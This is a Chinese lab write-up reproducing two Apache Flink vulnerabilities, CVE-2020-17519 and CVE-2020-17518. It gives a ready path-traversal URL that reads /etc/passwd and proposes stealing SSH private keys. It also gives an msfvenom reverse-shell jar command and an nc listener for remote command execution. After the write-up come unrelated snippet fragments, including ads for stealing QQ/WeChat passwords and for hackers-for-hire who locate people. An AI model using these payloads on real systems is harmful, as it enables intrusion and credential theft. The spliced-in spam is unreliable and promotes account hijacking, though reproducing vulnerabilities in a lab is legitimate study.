一、任意文件读取(CVE-2020-17519)
访问:http://your-ip:8081进入Apache Flink 控制面板:
在地址栏使用poc:
http:/x.x.x.x:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
读取/etc/passwd文件:
测试中发现在读取/etc/shadow文件不可行,存在权限问题,访问会直接报错:
但是可以尝试利用任意文件读取尝试去读取/home目录下的用户的.ssh文件夹的ssh私钥来进行ssh登录,再进行提取操作。(笔者未进行尝试,各位看官可以根据这个思路探索一哈)
二、任意文件上传(CVE-2020-17518)
Apache Flink 控制面板的Submit New Job处存在任意文件上传:
使用POC:
进入查看测试环境查看已经成功上传了success:
另外我们还可以上传上传jar马实现反弹监听从而进行远程命令执行
首先我们使用kali的MSF生成jar马:
msfvenom -p java/shell_reverse_tcp lhost=192.168.153.6 lport=5555 -f jar >/home/kali/Desktop/shell.jar
其中lhost为本地机器的IP,lport为反弹的端口。
可以看到成功生成了jar马(shell.jar)
然后本地机器新建命令行窗口,使用nc进行端口监听:nc -lvvp 5555
最后把生成的jar马通过Submit New Job模块进行上传:
点击Submit即可实现jar马反弹监听:
执行远程命令:
这里看到他的启动不是root用户,更能验证任意读取文件时读取shadow文件报错,跟权限问题相关的。
三、结束语
本次复现均是docker本地搭建模拟攻击行为,本文章仅用于交流学习,请勿使用该漏洞进行违法活动。
docker地址
https://github.com/vulhub/vulhub/tree/master/flink/
本文目录一览: 1、电影追凶结局什么意思 2、求一部关于美国中情局的电影 3、求一部2015有关于黑客的B站周末放映室有过的电影 4、求一个电影,关于外星人。里面还有一个黑人演员,貌似那个...
地摊小吃什么最火?下面这些地摊小吃你吃过几个?对付想经商却没有几多资本的伴侣来说摆地摊是快速赚钱的好要领。固然辛苦,选对小吃加盟项目对摆地摊就会起到事半功倍的浸染。那么,摆地摊卖什么好?地摊小吃什么最...
弄到他人qq密码方式 (不清楚登陆密码怎么登陆他人手机微信) 方式 一 大伙儿应用的“微信号码”全是关联了“手机号”,只需键入“手机号”随后发送信息“短信验证码”就可以登陆了。 详尽操作流程是:...
近期在网上盛行的紫药水染头发,有许多网民试着过,有些人不成功,有些人取得成功,有关紫药水着色的基本原理,很多人十分好奇心,那麼,紫药水染头发的基本原理是啥?能保持多长时间?下边我就产生详细介绍。 紫...
少则几十万,我认识的一个黑客一个月估计得赚20万左右吧 不要光想着找别人帮忙,骗子太多了。靠人不如靠己。你可以自己学。找不到方向我可以教你。如果你一心要找黑客建议去域外黑客联盟或者网络攻。 及时报警。...
黑客接单定位具体位置,现在,互联网的开展越来越迅速,并且咱们当前的生存也离不开互联网,尤为是咱们的手机微信,给人的生存带来了庞大的变更,使得微信已经成为我们生活中的一部分,人人都有手机微信号,是互相交...